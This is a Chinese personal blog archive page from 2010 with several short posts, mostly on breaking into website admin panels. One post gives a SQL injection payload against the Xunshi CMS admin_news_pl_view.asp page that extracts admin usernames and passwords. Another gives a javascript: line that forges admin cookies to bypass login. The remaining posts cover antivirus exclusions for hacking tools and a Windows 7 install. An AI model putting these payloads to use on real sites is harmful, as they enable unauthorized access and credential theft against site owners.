joybh.com
Archive for 五月, 2010
如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上百分之百。可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了PHP注入。其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台。其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。
如果你用这样的万能密码‘or’=’or’,当然进不去,理由是GPC开启的时候单引号会被转换。
有人公布了,讯时漏洞问题真大 !!!!
/admin/admin_news_pl_view.asp?id=1 //id任意 填入以下语句
有时1显示错误信息的时候继续往后退2,3,4。。。。
|’+dfirst(“[user]“,”[admin]“)+chr(124)+dfirst(“[pass]“,”[admin]“),username=’
cookies进后台
javascript:alert(document.cookie=”adminuser=” + escape(“admin”));alert(document.cookie=”adminpass=” + escape(“480d6d6b4d57cc903f3bab877248da40″));
系统换了个windows7,打算装个杀软,就选小红伞吧!好久没用过了。装的是P版的。
装好后,电脑上有很多文件都是黑软的东东,都会报毒的,于是设置下信任文件。在小红伞的专家模式下。
【扫描-例外】和【Guard-例外】里均添加外挂所在文件夹
普通PE下安装windows7,系统默认安装在C盘(在PE下直接setup安装不了)
论坛中有人发过硬盘安装windows8的帖子,忘了他叫什么,本人学习了他的精华,个别地方有小改动,安装成功,在这里感谢他。
1.把WINDOWS7的ISO镜像解压到D:\windows7\。
2.进入PE,格式化C盘为NTFS。
